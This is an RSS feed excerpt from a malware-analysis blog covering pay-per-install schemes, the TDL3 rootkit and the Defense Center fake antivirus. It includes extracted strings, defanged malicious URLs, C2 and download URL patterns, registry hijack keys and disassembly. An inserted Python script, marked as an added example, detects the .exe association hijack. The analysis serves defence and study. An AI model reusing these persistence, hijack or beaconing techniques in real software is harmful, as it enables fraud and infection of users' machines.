0x00012FA8	0x0000000C	PsGetVersion
0x00012FB8	0x0000001D	IoBuildDeviceIoControlRequest
0x00012FD8	0x00000011	KeInitializeEvent
0x00012FEC	0x0000000A	KeSetEvent
0x00012FFA	0x00000014	RtlFreeUnicodeString
0x00013012	0x00000017	RtlCompareUnicodeString
0x0001302C	0x00000014	RtlCopyUnicodeString
0x00013044	0x00000019	MmGetSystemRoutineAddress
0x00013060	0x00000011	RtlFreeAnsiString
0x00013074	0x0000001C	RtlUnicodeStringToAnsiString
0x00013094	0x00000016	RtlQueryRegistryValues
0x000130AE	0x0000001E	IoRegisterShutdownNotification
0x000130D0	0x00000013	KeSetPriorityThread
0x000130E6	0x00000014	PsCreateSystemThread
0x000130FE	0x00000019	RtlUnicodeStringToInteger
0x0001311A	0x00000013	RtlTimeToTimeFields
0x00013130	0x00000007	_allmul
0x0001313A	0x00000015	RtlWriteRegistryValue
0x00013152	0x00000014	RtlCreateRegistryKey
0x0001316A	0x00000008	swprintf
0x00013176	0x00000016	RtlDeleteRegistryValue
0x00013190	0x00000011	ObQueryNameString
0x000131A4	0x00000009	IoFreeIrp
0x000131B0	0x0000000E	ObInsertObject
0x000131C2	0x0000001E	SeSetAccessStateGenericMapping
0x000131E4	0x00000011	RtlMapGenericMask
0x000131F8	0x00000013	SeCreateAccessState
0x0001320E	0x0000000E	ObCreateObject
0x00013220	0x00000009	IoFreeMdl
0x0001322C	0x0000000D	MmUnlockPages
0x0001323C	0x0000000B	IoCancelIrp
0x0001324A	0x00000013	MmProbeAndLockPages
0x00013260	0x0000000D	IoAllocateMdl
0x00013270	0x00000018	KeWaitForMultipleObjects
0x0001328C	0x0000000C	KeResetEvent
0x0001329C	0x00000012	KeNumberProcessors
0x000132B2	0x00000008	_aulldiv
0x000132BE	0x0000001C	RtlAnsiStringToUnicodeString
0x000132DE	0x00000011	RtlInitAnsiString
0x000132F2	0x0000000B	KeTickCount
0x000132FE	0x0000000C	ntoskrnl.exe
0x0001330F	0x0000000F	eGetCurrentIrql
0x00013323	0x0000000A	fRaiseIrql
0x00013331	0x0000000A	fLowerIrql
0x0001333F	0x00000010	fReleaseSpinLock
0x00013353	0x00000010	fAcquireSpinLock
0x00013364	0x00000007	HAL.dll
0x0001336E	0x00000007	strncpy
0x00013378	0x00000007	wcsncpy
0x00013382	0x00000006	strlen
0x0001338C	0x00000010	RtlCompareMemory
0x000133A0	0x0000000A	ZwReadFile
0x000133AE	0x0000000B	ZwWriteFile
0x000133BC	0x00000011	KeQuerySystemTime
0x000133D0	0x00000006	strchr
0x000133DA	0x00000006	wcschr
0x000133E4	0x00000009	RtlUnwind
0x00013C39	0x00000009	;$;);2;9;</pre></td></tr></table></div>

<p>There you can see the &#8220;botnet&#8221; string; nothing good about that file. It also checks whether a kernel-mode debugger is running.</p>
<p>&nbsp;</p>
<p>To be continued&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-four/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pay-Per-Install Analysis &#8211; Part Three</title>
		<link>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-three/</link>
		<comments>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-three/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 14:43:06 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[pay per install]]></category>
		<category><![CDATA[ppi]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2784</guid>
		<description><![CDATA[InstallConverter &#160; This is where things get interesting. This company distributes one executable, TDL3. TDL3 is a very advanced piece of stealth malware, with rootkit capabilities. Here you can see Symantec are well aware of this. &#160; Backdoor.Tidserv &#160; &#160; This is how much they per for 1000 installs per country. USA - $170 Canada [...]]]></description>
			<content:encoded><![CDATA[<p><strong><u>InstallConverter</u></strong></p>
<p>&nbsp;</p>
<p>This is where things get interesting. This company distributes one executable, TDL3. TDL3 is a very advanced piece of stealth malware with rootkit capabilities. Here you can see that Symantec is well aware of it.</p>
<p>&nbsp;</p>
<p><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-091809-0911-99&amp;tabid=2" target="blank">Backdoor.Tidserv</a></p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-part-three-ic.png" target="_blank"><img src="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-part-three-ic.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p>This is how much they pay per 1000 installs, by country.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">USA - $170
Canada - $120
United Kingdom - $110
Australia, Austria, Belgium, Denmark, Finland, France, Germany, Greece, Iceland, Ireland, Italy, Netherlands, Norway, Spain, Sweden, Switzerland - $50</pre></div></div>

<p>This is a list of strings from the unpacked executable.  Notice the similarities to the Symantec writeup.</p>
<blockquote><p>0x00013158	0x00000016	%1d.%1d %04d SP%1d.%1d<br />
0x00013170	0x00000040	ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/<br />
0x000131BC	0x00000014	%s|%s|%s|%x|%x|%s|%s<br />
0x000131DC	0x00000012	%[^;];%[^;];%[^;];<br />
0x000131F8	0x0000000A	\tdrv<br />
0x00013204	0x0000000A	\tdev<br />
0x00013220	0x00000012	%[^;];%[^;];%[^;];<br />
0x0001323C	0x00000024	system\currentcontrolset\services\%s<br />
0x00013264	0x00000009	imagepath<br />
0x00013278	0x00000028	\registry\machine\%S<br />
0x000132A4	0x0000001C	\\?\globalroot%wZ\tdlcmd.dll<br />
0x000132C4	0x00000014	\\?\globalroot%wZ\%s<br />
0x000132DC	0x00000009	bckfg.tmp<br />
0x000132E8	0x00000014	\\?\globalroot%wZ\%s<br />
0x00013304	0x0000000E	%[^|]|%[^|]|%s<br />
0x00013314	0x00000007	servers<br />
0x0001331C	0x00000006	tdlcmd<br />
0x00013324	0x0000000A	wspservers<br />
0x00013330	0x00000006	tdlcmd<br />
0x00013338	0x0000000C	popupservers<br />
0x00013348	0x00000006	tdlcmd<br />
0x00013350	0x00000011	%d.%d.%d %d:%d:%d<br />
0x00013364	0x00000009	builddate<br />
0x00013370	0x00000018	services.exe<br />
0x0001338C	0x0000000E	IsWow64Process<br />
0x0001339C	0x00000008	kernel32<br />
0x000133A8	0x00000020	\\?\globalroot%s<br />
0x000133DC	0x00000007	spooler</p></blockquote>
<p>TDL3 infects a random driver, so after infection I ran TDSSKiller.</p>
<p>&nbsp;</p>
<p><a href="http://i32.tinypic.com/24zipmo.png" target="_blank"><img src="http://i32.tinypic.com/24zipmo.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p>There you can see it has infected one of my VirtualBox drivers. TDSSKiller was able to remove it after a reboot.</p>
<p>&nbsp;</p>
<p>To be continued&#8230;</p>
<p>&nbsp;</p>
<p>  <a href="http://www.f-secure.com/weblog/archives/00001976.html" target="blank">The Case Of TDL3</a><br />
  <a href="http://blog.eset.com/2010/06/25/tidy-tdss-tld3-paper" target="blank">Tidy TDSS (TLD3) Paper</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-three/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FakeAV Analysis: Defense Center</title>
		<link>http://blog.novirusthanks.org/2010/07/fakeav-analysis-defense-center/</link>
		<comments>http://blog.novirusthanks.org/2010/07/fakeav-analysis-defense-center/#comments</comments>
		<pubDate>Wed, 07 Jul 2010 11:37:54 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Malware Analysis]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2804</guid>
		<description><![CDATA[Defense Center is doing the rounds again, but this time seems to be a bit more aggresive! &#160; Lets start off with some screen shots. &#160; &#160; Like all rogue AV&#8217;s it bombards you with warnings about how your computer is &#8220;infected&#8221;. &#160; &#160; &#160; &#160; 30% off! You&#8217;d be a fool not to snap [...]]]></description>
			<content:encoded><![CDATA[<p>Defense Center is doing the rounds again, but this time it seems to be a bit more aggressive!</p>
<p>&nbsp;</p>
<p>Let's start off with some screenshots.</p>
<p>&nbsp;</p>
<p><a href="http://i46.tinypic.com/ws71mx.png" target="_blank"><img src="http://i46.tinypic.com/ws71mx.png" border="0" alt="Defence Center Main" height="300" width="350"></a></p>
<p>&nbsp;</p>
<p>Like all rogue AVs, it bombards you with warnings about how your computer is &#8220;infected&#8221;.</p>
<p>&nbsp;</p>
<p><a href="http://i50.tinypic.com/157frb.png" target="_blank"><img src="http://i50.tinypic.com/157frb.png" border="0" alt="Fake Attack" height="300" width="350"></a></p>
<p>&nbsp;</p>
<p><a href="http://i45.tinypic.com/10ynprs.png" target="_blank"><img src="http://i45.tinypic.com/10ynprs.png" border="0" alt="Fake Warning" height="300" width="350"></a></p>
<p>&nbsp;</p>
<p><a href="http://i45.tinypic.com/141v5s3.png" target="_blank"><img src="http://i45.tinypic.com/141v5s3.png" border="0" alt="Fake Alert" height="300" width="220"></a></p>
<p>&nbsp;</p>
<p>30% off!  You&#8217;d be a fool not to snap that offer up, wouldn&#8217;t you?</p>
<p>&nbsp;</p>
<p><a href="http://i48.tinypic.com/1rz29v.png" target="_blank"><img src="http://i48.tinypic.com/1rz29v.png" border="0" alt="Fake Offer" height="300" width="350"></a></p>
<p>&nbsp;</p>
<p>Once installed, Defense Center registers a handler in HKCR\.exe\shell\open\command so it can intercept every .exe that is launched; if it is not removed properly you won&#8217;t be able to run any .exe file at all.</p>
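<p>Checking a machine for this kind of hijack means following the association chain: HKCR\.exe names a file class (exefile on a clean system; the strings list further down shows a secfile class instead), and that class's shell\open\command must still be the default "%1" %*. The Python script below is an added example, not the blog's or the rogue's code; it parses a constructed .reg export (the defcnt.exe path in it is a placeholder) and flags every deviation from the clean chain.</p>

```python
"""Detect a hijacked .exe file association in an exported .reg fragment.

Added example, not code from the blog post or from the malware: the two
registry exports below are constructed by hand, modelled on the key names
visible in the Defense Center strings (HKCR\\.exe, a 'secfile' class,
shell\\open\\command, IsolatedCommand). The defcnt.exe path is a placeholder.
"""
import re

# What a clean Windows install has: .exe -> exefile, and exefile's open verb
# simply runs the file with its arguments.
CLEAN_CLASS = "exefile"
CLEAN_COMMAND = '"%1" %*'
EXE_KEY = r"hkey_classes_root\.exe"

# Constructed export of a clean machine.
CLEAN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.exe]
@="exefile"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
'''

# Constructed export after the rogue has re-pointed .exe at its own class.
INFECTED_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.exe]
@="secfile"
"Content Type"="application/x-msdownload"

[HKEY_CLASSES_ROOT\secfile\shell\open\command]
@="\"C:\\PLACEHOLDER\\Defense Center\\defcnt.exe\" /START \"%1\" %*"
"IsolatedCommand"="\"%1\" %*"
'''

# A value line is either @=... (default value) or "name"=...
_VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _unescape(s):
    """Undo .reg escaping: a backslash escapes the character after it."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse the REG_SZ values of a .reg export into {key: {name: data}}.

    Keys are lower-cased because registry key names are case-insensitive;
    the default value of a key is stored under the empty name.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m is None or current is None:
            continue
        name = "" if m.group(1) == "@" else _unescape(m.group(2))
        data = m.group(3)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            keys[current][name] = _unescape(data[1:-1])
    return keys


def check_exe_association(keys):
    """Return a list of findings; an empty list means the chain is clean."""
    findings = []
    cls = keys.get(EXE_KEY, {}).get("", CLEAN_CLASS)
    if cls.lower() != CLEAN_CLASS:
        findings.append("HKCR .exe points at class %r instead of %r"
                        % (cls, CLEAN_CLASS))
    # The dropper strings show shell verbs written both under the class key
    # and directly under .exe, so inspect both bases.
    for base in (EXE_KEY, "hkey_classes_root\\" + cls.lower()):
        for verb in ("open", "runas", "start"):
            key = "\\".join((base, "shell", verb, "command"))
            values = keys.get(key)
            if values is None:
                continue
            cmd = values.get("", "")
            if cmd != CLEAN_COMMAND:
                findings.append("%s launches %r instead of %r"
                                % (key, cmd, CLEAN_COMMAND))
    return findings


if __name__ == "__main__":
    for label, export in (("clean", CLEAN_REG), ("infected", INFECTED_REG)):
        print(label + ":")
        for finding in check_exe_association(parse_reg(export)) or ["ok"]:
            print("  " + finding)
```

On a live system the same chain can be exported with reg.exe (reg export HKCR\.exe) and fed to parse_reg; restoring the default exefile association is the usual cleanup step.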
<p>&nbsp;</p>
<p><a href="http://i49.tinypic.com/1zc0b9t.png" target="_blank"><img src="http://i49.tinypic.com/1zc0b9t.png" border="0" alt="Registry Modification" height="300" width="350"></a></p>
<p>&nbsp;</p>
<p>This is a list of strings from the unpacked dropper.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x00002110	0x0000000E	UNKNOWN
0x00002120	0x00000014	%s%s%d.tmp
0x00002140	0x00000014	Azerbaijan
0x00002158	0x0000000E	Belarus
0x00002168	0x00000014	Kazakhstan
0x00002180	0x00000014	Kyrgyzstan
0x00002198	0x0000000C	Russia
0x000021A8	0x00000014	Uzbekistan
0x000021C0	0x0000000E	Ukraine
0x000021D0	0x0000001C	Czech Republic
0x000021F0	0x0000000C	Poland
0x00002210	0x00000018	_favdata.dat
0x00002230	0x00000014	Printers\Connections
0x00002248	0x00000005	affid
0x00002250	0x00000005	subid
0x00002258	0x0000004A	\AAB647AB-4C1A-4cf0-9DE5-DD056FABF1F9
0x000022A4	0x0000000C	%[^;];%[^;];
0x000022BC	0x0000000E	IsWow64Process
0x000022CC	0x00000008	kernel32
0x000022D8	0x00000015	ObtainUserAgentString
0x000022F0	0x0000000A	urlmon.dll
0x000022FC	0x00000037	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
&nbsp;
336;landing;-1;.hxxp://Traffic-Photos.com/ms05/ad;hxxp://www.easysecurityscan.com/ms05/ad;hxxp://www.fastanyprime.com/ms05/ad;...hxxp://Traffic-Photos.com/ms05/ad;hxxp://www.easysecurityscan.com/ms05/ad;hxxp://www.fastanyprime.com/ms05/ad</pre></td></tr></table></div>

<p>Here we can see the results for these URLs on URLVoid.</p>
<p>&nbsp;</p>
<blockquote><p><a href="http://www.urlvoid.com/?domain=Traffic-Photos.com" target="blank">Traffic-Photos.com</a><br />
<a href="http://www.urlvoid.com/?domain=easysecurityscan.com" target="blank">easysecurityscan.com</a><br />
<a href="http://www.urlvoid.com/?domain=fastanyprime.com" target="blank">fastanyprime.com</a></p></blockquote>
<p>&nbsp;</p>
<p>The short list of country strings names the countries on which the malware&#8217;s author doesn&#8217;t want it to execute; the loop below compares each of them against the local country name and exits if one matches.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0040113A   |&gt;  56                 /PUSH ESI                                          ; /wstr2 = &quot;United States&quot;
0040113B   |. |FF74BD DC          |PUSH DWORD PTR SS:[EBP+EDI*4-24]                  ; |wstr1 = &quot;Azerbaijan&quot;
0040113F   |. |E8 5E0A0000        |CALL                         ; \_wcsicmp
00401144   |. |85C0               |TEST EAX,EAX
00401146   |. |59                 |POP ECX
00401147   |. |59                 |POP ECX
00401148   |. |74 0C              |JE SHORT dump_.00401156 ; eventually goes to ExitProcess.
0040114A   |. |47                 |INC EDI
0040114B   |. |83FF 09            |CMP EDI,9
0040114E   |.^\72 EA              \JB SHORT dump_.0040113A</pre></td></tr></table></div>

<p>This is a list of strings from the dropped file that now handles every .exe launch.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x00005044	0x00000011	 jour importantes
0x000051F5	0x00000005	 jour
0x0000539C	0x00000014	Updates installieren
0x000053B4	0x00000050	Riavviare il computer per completare l'installazione di importanti aggiornamenti
0x0000556C	0x00000016	Installa aggiornamenti
0x000055AB	0x0000002A	re installasjonen av viktige oppdateringer
0x000056F4	0x00000017	Installer oppdateringer
0x0000570C	0x00000046	Reinicie su equipo para acabar de instalar actualizaciones importantes
0x000058C4	0x00000018	Instalar actualizaciones
0x000058E0	0x0000003C	Restart your computer to finish installing important updates
0x00005920	0x00000018	AUTMGR32.EXE
0x000059FC	0x00000009	1. Click 
0x00005A08	0x00000011	&quot;Install Updates&quot;
0x00005A1C	0x00000009	2. Click 
0x00005A28	0x00000018	 when UAC screen appears
0x00005A44	0x00000007	&quot;Allow&quot;
0x00005A4C	0x0000000E	System Failure
0x00005BC0	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005C40	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005CC0	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005D44	0x00000005	ffid_
0x00005D63	0x00000008	heck_vm_
0x00005D83	0x00000006	setid_
0x00005DA0	0x0000000A	runas
0x00005DAC	0x00000022	WindowsUpdate.exe
0x00005DD0	0x0000000C	\license.dat
0x00005DE0	0x00000017	Software\Defense Center
0x00005DF8	0x00000007	License
0x00005E00	0x0000002C	94804860143697233939975370329435970097710202
0x00005E30	0x0000000C	LoadLibraryA
0x00005E40	0x0000000C	kernel32.dll
0x00005E50	0x00000030	AcceptedPrivacyStatement
0x00005E84	0x0000005E	Software\Classes\Software\Microsoft\Preferences
0x00005EE4	0x00000046	Software\Classes\Software\Microsoft
0x00005F2C	0x00000032	Software\Classes\Software
0x00005F60	0x00000058	Software\Classes\secfile\shell\start\command
0x00005FBC	0x00000048	Software\Classes\secfile\shell\start
0x00006008	0x00000058	Software\Classes\secfile\shell\runas\command
0x00006064	0x00000048	Software\Classes\secfile\shell\runas
0x000060B0	0x00000056	Software\Classes\secfile\shell\open\command
0x00006108	0x00000046	Software\Classes\secfile\shell\open
0x00006150	0x0000003C	Software\Classes\secfile\shell
0x00006190	0x00000048	Software\Classes\secfile\DefaultIcon
0x000061DC	0x00000030	Software\Classes\secfile
0x00006210	0x00000016	Application
0x00006228	0x00000052	Software\Classes\.exe\shell\start\command
0x0000627C	0x00000042	Software\Classes\.exe\shell\start
0x000062C0	0x00000052	Software\Classes\.exe\shell\runas\command
0x00006314	0x00000042	Software\Classes\.exe\shell\runas
0x00006358	0x0000001E	IsolatedCommand
0x00006378	0x0000000E	&quot;%1&quot; %*
0x00006388	0x0000002A	&quot;%s&quot; /START &quot;%%1&quot; %%*
0x000063B4	0x00000050	Software\Classes\.exe\shell\open\command
0x00006408	0x00000040	Software\Classes\.exe\shell\open
0x0000644C	0x00000036	Software\Classes\.exe\shell
0x0000648C	0x00000042	Software\Classes\.exe\DefaultIcon
0x000064D0	0x00000018	Content Type
0x000064EC	0x00000030	application/x-msdownload
0x00006520	0x0000000E	secfile
0x00006530	0x0000002A	Software\Classes\.exe
0x0000655C	0x00000020	Software\Classes
0x0000658C	0x00000039	Software\Microsoft\Windows\CurrentVersion\Policies\System
0x000065C8	0x0000000E	DisableTaskMgr
0x000065D8	0x00000014	topwesitjh
0x000065F0	0x00000048	d8bb5910-2d85-489b-8403-803ed25e73bc
0x0000663C	0x00000048	9cf2592c-1832-4358-a0fc-26d6a0c29808
0x00006688	0x00000005	%09lu
0x00006690	0x00000008	wget 3.0
0x0000669C	0x00000048	f7c5da73-b4a5-4947-8f40-08f2871eb36b
0x000066E8	0x00000010	Software
0x00006700	0x0000001B	http://%s/any2/%s-direct.ex
0x00006734	0x0000000D	\_favdata.dat
0x00006744	0x00000006	French
0x0000674C	0x00000007	Italian
0x00006754	0x00000006	German
0x0000675C	0x00000007	Spanish
0x00006764	0x00000009	Norwegian
0x00006770	0x00000006	Polish
0x00006778	0x00000005	Czech
0x00006780	0x00000009	Ukrainian
0x0000678C	0x00000007	Russian
0x00006794	0x00000006	_Run@0
0x0000679C	0x0000000C	Explorer.exe
0x000067AC	0x0000000E	mschrt20ex.dll
0x000067C4	0x0000000E	/START 
0x000067D4	0x0000000C	/START
0x0000B350	0x00000005	.text
0x0000B377	0x00000007	`.rdata
0x0000B39F	0x00000006	@.data
0x0000B3C8	0x00000005	.rsrc
0x0000B3EF	0x00000007	@.fasoc
0x0000CF7D	0x00000005	(&gt;T$C
0x0000D12E	0x00000014	ouporn.com
0x0000D144	0x00000018	nudetube.com
0x0000D160	0x0000001A	pornotube.com
0x0000D17C	0x0000000A	3.ico
0x0000D188	0x0000000A	2.ico
0x0000D194	0x0000000A	1.ico
0x0000D1A0	0x000000A0	A security threat detected on your computer! This malicious program may steal your private data. Click on the message to ensure 
0x0000D248	0x0000009A	Harmful viruses detected on your computer. This malicious software may harm your computer. Click on the message to ensure the pr
0x0000D2E8	0x000000C0	You are running a trial antivirus software version. Activate your antivirus software copy to get full-time antivirus protection.
0x0000D3B0	0x0000008D	It is strongly recommended to protect your computer against security threats. Click on the message to ensure the protection of y
0x0000D440	0x000000B5	It is strongly recommended to remove all detected viruses to protect your computer against existing security threats. Click on t
0x0000D4F8	0x00000007	Danger!
0x0000D500	0x0000009D	A security threat detected on your computer. TrojanASPX.JS.Win32. It strongly recommended to remove this threat right now. Click
0x0000D5A0	0x0000007A	Unauthorized person tries to steal your passwords and private information. Click on the message to prevent identity theft.
0x0000D620	0x00000066	Unauthosrized access to your computer! Click on the message to install up-to-date antivirus software. 
0x0000D688	0x00000074	Harmful viruses detected on your computer. Click on the message to scan your computer for security threats for free.
0x0000D700	0x00000005	%09lu
0x0000D708	0x00000034	\Defense Center\defcnt.exe
0x0000D748	0x00000018	wscsvc32.exe
0x0000D768	0x00000048	d8bb5910-2d85-489b-8403-803ed25e73bc
0x0000D7B4	0x0000002C	94804860143697233939975370329435970097710202
0x0000D7E4	0x00000007	License
0x0000D7EC	0x00000017	Software\Defense Center
0x0000D804	0x0000000C	\license.dat
0x0000D814	0x0000001A	\Defense Center\defcnt.exe
0x0000D830	0x00000016	Windows Security Alert
0x0000D848	0x0000000C	 /inst
0x0000D860	0x0000001E	eiojrthgoeijujwqodiehurisejawu
0x0000D880	0x00000018	\spam001.exe
0x0000D89C	0x00000018	\spam003.exe
0x0000D8B8	0x00000018	\troj000.exe
0x0000D8D4	0x0000000D	Shell_TrayWnd
0x0000D8E4	0x00000006	Button
0x0000D8F0	0x00000098	System files of your computer are damaged. Please, restart your system ASAP.
0x0000D994	0x00000014	Printers\Connections
0x0000D9B0	0x0000000D	\_favdata.dat
0x0000D9C8	0x0000004E	http://%s/readdatagateway.php?type=stats&amp;affid=%s&amp;subid=%s&amp;version=%s&amp;adwareok
0x0000DA18	0x0000000E	DisableTaskMgr
0x0000DA28	0x00000039	Software\Microsoft\Windows\CurrentVersion\Policies\System
0x0000DA64	0x0000000C	explorer.exe
0x0000DA74	0x00000008	Software
0x0000DA80	0x00000024	dd1c3e54-4b10-4a73-91eb-fa561c094261
0x0000DAA8	0x00000024	24d1ca9a-a864-4f7b-86fe-495eb56529d8
0x0000DAD0	0x00000008	wget 3.0
0x0000DAE0	0x0000003E	\Internet Explorer\iexplore.exe
0x0000DB30	0x00000026	SeShutdownPrivilege
0x0000DB58	0x00000014	fiuejsiogj
0x0000DD88	0x00000009	ntdll.dll
0x0000DD94	0x00000008	StrStrIA
0x0000DDA0	0x00000007	StrCatW
0x0000DDAA	0x0000000A	wnsprintfA
0x0000DDB8	0x00000007	StrCpyW
0x0000DDC0	0x0000000B	SHLWAPI.dll
0x0000DDCE	0x00000010	InternetOpenUrlA
0x0000DDE2	0x00000010	InternetReadFile
0x0000DDF6	0x0000000D	InternetOpenA
0x0000DE07	0x00000012	nternetCloseHandle
0x0000DE1A	0x0000000B	WININET.dll
0x0000DE28	0x00000017	SHGetSpecialFolderPathA
0x0000DE42	0x00000017	SHGetSpecialFolderPathW
0x0000DE5C	0x00000011	Shell_NotifyIconA
0x0000DE6E	0x0000000B	SHELL32.dll
0x0000DE7C	0x00000010	GetComputerNameA
0x0000DE91	0x0000000B	reateMutexW
0x0000DEA0	0x00000008	lstrlenA
0x0000DEAC	0x00000009	lstrcpynA
0x0000DEB8	0x00000013	WaitForSingleObject
0x0000DECE	0x0000000C	GetTickCount
0x0000DEDE	0x0000000B	VirtualFree
0x0000DEEC	0x00000019	InitializeCriticalSection
0x0000DF08	0x00000015	GetVolumeInformationA
0x0000DF20	0x00000005	Sleep
0x0000DF28	0x00000008	lstrcatA
0x0000DF34	0x00000008	lstrlenW
0x0000DF40	0x0000000C	GetTempPathW
0x0000DF50	0x00000019	DisableThreadLibraryCalls
0x0000DF6C	0x00000012	GetModuleFileNameA
0x0000DF82	0x00000008	lstrcatW
0x0000DF8E	0x00000015	DeleteCriticalSection
0x0000DFA7	0x0000000B	reateThread
0x0000DFB6	0x00000008	lstrcpyA
0x0000DFC2	0x00000010	GetTempFileNameW
0x0000DFD7	0x0000000A	reateFileA
0x0000DFE4	0x0000000B	GetFileSize
0x0000DFF2	0x0000000E	SetFilePointer
0x0000E004	0x0000000D	FindResourceW
0x0000E014	0x0000000C	LoadResource
0x0000E025	0x0000000D	reateProcessW
0x0000E036	0x00000011	GetCurrentProcess
0x0000E04A	0x00000009	WriteFile
0x0000E056	0x0000000E	SizeofResource
0x0000E068	0x00000012	GetFileAttributesA
0x0000E07E	0x00000008	ReadFile
0x0000E08B	0x0000000A	reateFileW
0x0000E098	0x0000000C	GetLastError
0x0000E0A8	0x0000000C	VirtualAlloc
0x0000E0B8	0x0000000C	LockResource
0x0000E0C9	0x0000000A	loseHandle
0x0000E0D4	0x0000000C	KERNEL32.dll
0x0000E0E4	0x00000010	DispatchMessageW
0x0000E0F8	0x0000000B	FindWindowA
0x0000E106	0x0000000C	SendMessageW
0x0000E116	0x0000000C	PostMessageA
0x0000E126	0x00000008	IsWindow
0x0000E132	0x0000000A	ShowWindow
0x0000E140	0x00000009	EndDialog
0x0000E14C	0x0000000E	GetWindowTextW
0x0000E15E	0x00000009	LoadIconW
0x0000E16A	0x00000010	IsDialogMessageW
0x0000E17E	0x00000010	TranslateMessage
0x0000E192	0x0000000B	EnumWindows
0x0000E1A0	0x00000009	wsprintfA
0x0000E1AC	0x00000009	KillTimer
0x0000E1B8	0x0000000C	PostMessageW
0x0000E1C8	0x0000000B	GetMessageW
0x0000E1D7	0x00000011	reateDialogParamA
0x0000E1EC	0x00000008	SetTimer
0x0000E1F6	0x0000000A	USER32.dll
0x0000E204	0x00000010	OpenProcessToken
0x0000E218	0x0000000E	RegSetValueExA
0x0000E22A	0x00000010	RegQueryValueExA
0x0000E23E	0x0000000D	RegCreateKeyA
0x0000E24E	0x00000015	LookupPrivilegeValueW
0x0000E266	0x0000000B	RegOpenKeyA
0x0000E274	0x00000015	AdjustTokenPrivileges
0x0000E28C	0x00000017	InitiateSystemShutdownW
0x0000E2A6	0x0000000B	RegCloseKey
0x0000E2B2	0x0000000C	ADVAPI32.dll
0x0000E2C3	0x0000000B	oInitialize
0x0000E2D2	0x00000010	CoCreateInstance
0x0000E2E4	0x00000009	ole32.dll
0x0000E2F0	0x00000006	memset
0x0000E2FA	0x00000007	_chkstk
0x0000E342	0x0000000A	Adware.dll
0x0000E34D	0x00000006	_Run@0
0x0000E36C	0x00000036	f:\src\mrs_adware\Adware2\trunk\Dll\release\Adware.pdb
0x00020097	0x00000007	)w2%n%~
0x000234F3	0x00000005	q\MP&amp;amp;
0x000264C7	0x00000005	rX${p
0x00027B44	0x00000005	03uJS
0x0002E1F5	0x00000007	zdC?irU
0x000369EA	0x00000006	g@*jRV
0x000520A2	0x00000009	qE{tDs/id
0x00054406	0x00000005	\6+9'
0x0005AB1F	0x00000005	SI~/W
0x0005AD20	0x0000000C	kernel32.dll
0x0005AD2F	0x00000010	GetModuleHandleW
0x0005AD42	0x00000010	GetCurrentThread
0x0005AD55	0x0000000F	TerminateThread
0x0005AD75	0x0000000C	advapi32.dll
0x0005AD84	0x00000011	AdjustTokenGroups
0x0005AD98	0x0000000D	CloseEventLog
0x0005ADA8	0x00000011	CryptSetHashParam
0x0005ADBC	0x00000009	DeleteAce
0x0005ADC8	0x0000000E	DuplicateToken
0x0005ADD9	0x00000011	CryptGetHashParam
0x0005AE07	0x0000000A	msvcrt.dll
0x0005AE1B	0x00000010	_except_handler2
0x0005AE2E	0x00000007	_CIacos
0x0005AE38	0x00000006	_cexit
0x0006B78A	0x0000001C	Windows Update
0x0006B7AA	0x00000018	MS Shell Dlg
0x0006B7DA	0x0000001E	Install Updates
0x0006B812	0x0000000C	Static
0x0006B83A	0x00000012	1. Click 
0x0006B866	0x00000022	&quot;Install Updates&quot;
0x0006B8A2	0x00000010	2. Click
0x0006B8CE	0x0000000E	&quot;Allow&quot;
0x0006B8F6	0x0000002E	when UAC screen appears</pre></td></tr></table></div>

<p>Notice the compile path for the DLL?</p>
<pre>f:\src\mrs_adware\Adware2\trunk\Dll\release\Adware.pdb</pre>
<p>This malware also creates some p0rn shortcuts on the desktop, and three other files, spam001.exe, spam003.exe and troj000.exe, but these files aren&#8217;t actually executables.</p>
<p>This is what the payment screen looks like in their so-called &#8220;Safebrowser&#8221;. Obviously, filling in that information could put you in serious danger: they could empty your bank account and/or use the personal details for identity theft.</p>
